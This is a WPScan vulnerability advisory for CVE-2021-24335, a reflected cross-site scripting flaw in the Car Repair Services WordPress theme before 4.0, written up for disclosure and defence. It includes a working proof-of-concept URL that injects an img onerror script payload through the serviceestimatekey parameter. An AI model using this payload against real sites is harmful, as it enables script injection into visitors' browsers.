Themes Vulnerabilities

Car Repair Services < 4.0 - Unauthenticated Reflected XSS & XFS

Description

The theme did not properly sanitise its serviceestimatekey search parameter before outputting it back in the page, leading to a reflected Cross-Site Scripting issue

Proof of Concept

https://smartdata.tonytemplates.com/car-repair-service-v4/car1/estimateresult/result?s=&serviceestimatekey=<img+src%3Dx+onerror%3Dalert(`m0ze`)%3B>

Affects Themes

car-repair-services

Fixed in version 4.0

References

CVE

CVE-2021-24335

URL

https://themeforest.net/item/car-repair-services-auto-mechanic-wordpress-theme/19823557

URL

https://m0ze.ru/vulnerability/[2021-02-12]-[WordPress]-[CWE-79]-Car-Repair-Services-WordPress-Theme-v3.9.txt

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CWE-79

Miscellaneous

Original Researcher

m0ze

Submitter

m0ze

Submitter website

https://m0ze.ru

Submitter twitter

vladm0ze

Verified

Yes

WPVDB ID

39258aba-2449-4214-a490-b8e46945117d

Timeline

Publicly Published

2021-05-17 (about 1 years ago)

Added

2021-05-17 (about 1 years ago)

Last Updated

2021-05-18 (about 1 years ago)

Our Other Services

WPScan WordPress Security Plugin